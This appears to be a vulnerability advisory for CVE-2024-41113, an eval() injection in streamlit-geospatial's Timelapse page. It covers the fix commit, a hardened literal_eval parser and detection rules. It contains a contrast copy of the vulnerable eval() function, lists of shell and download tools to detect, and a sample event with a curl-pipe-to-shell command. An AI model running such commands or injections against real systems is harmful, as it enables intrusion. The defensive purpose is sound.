CVE-2024-41113
📋 TL;DR
This vulnerability in streamlit-geospatial allows remote code execution: the Timelapse page reads a visualization-parameters string from a text area and passes it straight to Python's eval(), so anyone who can reach the page can run arbitrary Python with the privileges of the Streamlit server process. Any deployment that serves the affected pages/1_📷_Timelapse.py page is exposed.
💻 Affected Systems
- streamlit-geospatial
📦 What is this software?
streamlit-geospatial is an open-source, multipage Streamlit web application from the opengeos project for interactive geospatial visualization (built on leafmap and geemap). Each page is a Python module under pages/, which is where the affected Timelapse page lives; Streamlit itself ships with no authentication, so the page is reachable by anyone who can reach the app.
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attackers to execute arbitrary commands, steal sensitive data, install malware, pivot to other systems, and maintain persistent access.
Likely Case
Remote code execution leading to application compromise, data exfiltration, and potential lateral movement within the network.
If Mitigated
No impact if the vulnerability is patched or proper input validation prevents malicious eval() execution.
🎯 Exploit Status
Exploitation is trivial: the attacker types a Python expression into the visualization-parameters field and the server evaluates it. No credentials are needed beyond network access to the app. The GitHub Security Lab advisory (GHSL-2024-100 through GHSL-2024-108) documents this and related issues in the project.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Commit c4f81d9616d40c60584e36abb15300853a66e489
Vendor Advisory: https://securitylab.github.com/advisories/GHSL-2024-100_GHSL-2024-108_streamlit-geospatial/
Restart Required: Yes
Instructions:
1. Update to a streamlit-geospatial revision that contains commit c4f81d9616d40c60584e36abb15300853a66e489.
2. Restart the Streamlit application so the patched page module is loaded.
3. Verify the fix by confirming that pages/1_📷_Timelapse.py no longer passes the vis_params text to eval().
🔧 Temporary Workarounds
Disable Timelapse Page
Remove or disable access to the vulnerable Timelapse.py page. Streamlit only registers files ending in .py under pages/, so renaming the file removes the page from the app:
mv pages/1_📷_Timelapse.py pages/1_📷_Timelapse.py.disabled
Input Validation Filter
Parse vis_params with ast.literal_eval() and validate the result instead of calling eval()
# In pages/1_📷_Timelapse.py around line 395: replace eval(vis_params) with a literal-only parse plus a check that the result is a dict of expected keys
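The vulnerable pattern next to a hardened replacement, as an added example that is not code from streamlit-geospatial or from the fix commit. It assumes the page only needs a small set of visualization keys (the ALLOWED_KEYS set below is a hypothetical allow-list; adjust it to what the map library actually consumes). The vulnerable function is kept only to show that a payload which is not a dict at all is executed rather than rejected.

```python
"""Added example (not part of streamlit-geospatial): eval() on a text-area
string versus a literal-only parse with shape validation."""
import ast
from typing import Any

# Hypothetical allow-list of visualization keys the page is expected to accept.
ALLOWED_KEYS = {"min", "max", "bands", "palette", "gamma", "opacity"}
NUMERIC_KEYS = ("min", "max", "gamma", "opacity")
STRING_LIST_KEYS = ("bands", "palette")

# Constructed payload: a Python expression, not a dict. eval() runs it.
DEMO_PAYLOAD = "__import__('os').getcwd()"


def parse_vis_params_vulnerable(text: str) -> Any:
    """Reproduces the vulnerable pattern: any Python expression executes."""
    return eval(text)  # user-controlled input; shown only for contrast


def parse_vis_params_safe(text: str) -> dict:
    """Accept only a literal dict with known keys and sane value types."""
    if len(text) > 2000:
        raise ValueError("vis_params too long")
    try:
        # literal_eval never evaluates names, calls, attributes or operators
        value = ast.literal_eval(text)
    except (ValueError, TypeError, SyntaxError, MemoryError, RecursionError) as exc:
        raise ValueError(f"vis_params is not a literal dict: {exc}") from None
    if not isinstance(value, dict):
        raise ValueError("vis_params must be a dict")
    unknown = set(value) - ALLOWED_KEYS
    if unknown:
        raise ValueError(f"unsupported vis_params keys: {sorted(unknown)}")
    for key in NUMERIC_KEYS:
        if key in value and (isinstance(value[key], bool)
                             or not isinstance(value[key], (int, float))):
            raise ValueError(f"{key} must be a number")
    for key in STRING_LIST_KEYS:
        if key in value and not (isinstance(value[key], list)
                                 and all(isinstance(x, str) for x in value[key])):
            raise ValueError(f"{key} must be a list of strings")
    return value


def rejects(text: str) -> bool:
    """True when the hardened parser refuses the input."""
    try:
        parse_vis_params_safe(text)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(parse_vis_params_safe("{'min': 0, 'max': 4000, 'bands': ['B4', 'B3', 'B2']}"))
    print("payload rejected:", rejects(DEMO_PAYLOAD))
    # The vulnerable version returns the working directory: the call ran.
    print("vulnerable eval() executed the payload:", parse_vis_params_vulnerable(DEMO_PAYLOAD))
```

The size limit and the explicit exception list matter: ast.literal_eval is safe from code execution but can still be fed deeply nested literals that exhaust memory or the recursion limit, so cap the input and catch MemoryError and RecursionError rather than only ValueError.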
🧯 If You Can't Patch
- Implement strict network access controls (reverse proxy with authentication, allow-listed source addresses, or VPN-only exposure) so that only trusted users can reach the streamlit-geospatial application
- Deploy a web application firewall (WAF) with RCE protection rules, but treat it as a speed bump only: any Python expression works as a payload, so signature rules are easy to bypass
- Run the app as an unprivileged user in a container or VM with no API tokens or cloud credentials in its environment that the app does not need, since the process environment is the first thing an attacker will read
🔍 How to Verify
Check if Vulnerable:
Check whether pages/1_📷_Timelapse.py in your checkout passes the vis_params text-area value to eval(); in the referenced revision (4b89495f) the call is at line 395, but the line number shifts between versions, so search for the call rather than the line.
Check Version:
git merge-base --is-ancestor c4f81d9616d40c60584e36abb15300853a66e489 HEAD && echo "fix commit present" || echo "fix commit MISSING"
(git log --oneline abbreviates hashes, so grepping it for the full 40-character hash will never match; --is-ancestor checks whether the fix is reachable from the checked-out revision.)
Verify Fix Applied:
Verify that commit c4f81d9616d40c60584e36abb15300853a66e489 is present in your codebase and eval() no longer processes unsanitized user input
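A version-independent check, added here as an example and not part of the project: it parses the page module with the ast module and reports every call to the builtin eval(), so the audit does not depend on a line number. The two snippets it is run against are constructed stand-ins for the pre-fix and post-fix shape of the page, not the project's source; the helper that asks git whether the fix commit is an ancestor is included for completeness and needs a real checkout.

```python
"""Added example (not from streamlit-geospatial): find eval() calls in a page
module with ast, and ask git whether the fix commit is reachable."""
import ast
import subprocess
from pathlib import Path

FIX_COMMIT = "c4f81d9616d40c60584e36abb15300853a66e489"


def find_eval_calls(source: str) -> list:
    """Return (line, argument_source) for each call to the builtin eval()."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)   # bare eval(...), not ast.literal_eval(...)
                and node.func.id == "eval"):
            arg = ast.unparse(node.args[0]) if node.args else ""
            hits.append((node.lineno, arg))
    return hits


def is_vulnerable_file(path) -> bool:
    """True when the module at `path` still contains a builtin eval() call."""
    return bool(find_eval_calls(Path(path).read_text(encoding="utf-8")))


def fix_commit_is_ancestor(repo_dir: str) -> bool:
    """Run `git merge-base --is-ancestor` in a real checkout (needs git)."""
    result = subprocess.run(
        ["git", "-C", repo_dir, "merge-base", "--is-ancestor", FIX_COMMIT, "HEAD"],
        capture_output=True,
    )
    return result.returncode == 0


# Constructed stand-ins for the vulnerable and fixed shape of the page.
VULNERABLE_SNIPPET = '''
import streamlit as st
vis_params = st.text_area("Enter visualization parameters", "{}")
try:
    vis_params = eval(vis_params)
except Exception as e:
    st.error(e)
'''
FIXED_SNIPPET = VULNERABLE_SNIPPET.replace("eval(vis_params)", "ast.literal_eval(vis_params)")


if __name__ == "__main__":
    print("vulnerable snippet:", find_eval_calls(VULNERABLE_SNIPPET))
    print("fixed snippet:     ", find_eval_calls(FIXED_SNIPPET))
    # Real use, assuming the checkout is the current directory:
    # print(is_vulnerable_file("pages/1_📷_Timelapse.py"), fix_commit_is_ancestor("."))
```

Matching on ast.Name deliberately ignores ast.literal_eval(...) (an attribute call) and would also miss a locally rebound eval, so read any hit by hand rather than trusting an empty result blindly.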
📡 Detection & Monitoring
Log Indicators:
- Tracebacks from pages/1_📷_Timelapse.py whose next frame is File "<string>", line 1: that is the frame name Python gives to code compiled from a string by eval(), so a failing or probing payload leaves it in the app log
- Suspicious command execution in application logs (errors mentioning os.system, subprocess or shell commands where the page only renders maps)
- Unexpected child processes (sh, bash, curl, wget, nc) whose parent is the python process running streamlit run; eval() itself runs in-process and changes nothing on the command line, so the child process is what you can see
Network Indicators:
- Unusual outbound connections from streamlit process
- Data exfiltration patterns
SIEM Query:
parent_command_line:*streamlit\ run* AND process_name:(sh OR bash OR dash OR curl OR wget OR nc OR ncat)
(A query on command_line:*eval* will not fire: the payload is evaluated inside the existing Streamlit process and never appears on a command line. Alert on what the payload does next, namely shells and download tools spawned by the server process, and tune out any helpers the app legitimately runs.)
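The two detections above run over constructed sample data, as an added example that is not part of the advisory or the project: one walks application log lines looking for a Timelapse.py frame followed within two lines by the File "<string>" frame that eval() produces, the other flags shell or download tools whose parent command line is the Streamlit server. The log lines and process events are made up for the example; field names in the events (parent_cmdline, child_name) are assumptions, not the schema of any particular EDR.

```python
"""Added example (not from the advisory): eval() traceback and child-process
detections over constructed Streamlit log lines and process events."""
import re
from typing import Iterable

TIMELAPSE_FRAME = re.compile(r'File ".*Timelapse\.py", line \d+')
STRING_FRAME = re.compile(r'File "<string>", line \d+, in <module>')
SUSPICIOUS_CHILDREN = {"sh", "bash", "dash", "curl", "wget", "nc", "ncat"}


def eval_traceback_alerts(lines: Iterable[str]) -> list:
    """Indexes of '<string>' frames that directly follow a Timelapse.py frame.

    A traceback prints the frame header, then the source line, then the next
    frame, so the eval'd-code frame sits at most two lines after the page frame.
    """
    alerts = []
    last_page_frame = None
    for idx, line in enumerate(lines):
        if (STRING_FRAME.search(line) and last_page_frame is not None
                and idx - last_page_frame <= 2):
            alerts.append(idx)
        if TIMELAPSE_FRAME.search(line):
            last_page_frame = idx
    return alerts


def suspicious_spawns(events: Iterable[dict]) -> list:
    """Child processes of the Streamlit server that a map page should not start."""
    return [e for e in events
            if "streamlit run" in e["parent_cmdline"]
            and e["child_name"] in SUSPICIOUS_CHILDREN]


# Constructed log excerpt: a probing payload that raised inside eval(), then an
# unrelated error from another page that must not fire.
SAMPLE_LOG = """\
2024-07-01 10:02:11 Traceback (most recent call last):
  File "/app/pages/1_📷_Timelapse.py", line 395, in <module>
    vis_params = eval(vis_params)
  File "<string>", line 1, in <module>
NameError: name 'foo' is not defined
2024-07-01 10:02:15 Traceback (most recent call last):
  File "/app/pages/other_page.py", line 40, in <module>
    df = pd.read_csv(url)
urllib.error.URLError: <urlopen error [Errno -2] Name or service not known>
""".splitlines()

# Constructed process events (field names are assumptions for the example).
SAMPLE_EVENTS = [
    {"parent_cmdline": "python -m streamlit run Home.py", "child_name": "sh",
     "child_cmdline": "sh -c 'curl http://203.0.113.5/x | sh'"},
    {"parent_cmdline": "python -m streamlit run Home.py", "child_name": "gdalinfo",
     "child_cmdline": "gdalinfo /tmp/tile.tif"},   # benign helper, constructed
    {"parent_cmdline": "/usr/sbin/cron -f", "child_name": "sh",
     "child_cmdline": "sh -c logrotate"},
]


if __name__ == "__main__":
    for i in eval_traceback_alerts(SAMPLE_LOG):
        print("eval() traceback at log line", i, ":", SAMPLE_LOG[i - 2].strip())
    for e in suspicious_spawns(SAMPLE_EVENTS):
        print("suspicious child:", e["child_cmdline"])
```

The traceback detector only sees failed payloads; a working payload raises nothing, so the process-spawn rule (and egress monitoring on the server) is the one to rely on.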
🔗 References
- https://github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py#L383-L388
- https://github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py#L390-L393
- https://github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py#L395
- https://github.com/opengeos/streamlit-geospatial/commit/c4f81d9616d40c60584e36abb15300853a66e489
- https://securitylab.github.com/advisories/GHSL-2024-100_GHSL-2024-108_streamlit-geospatial/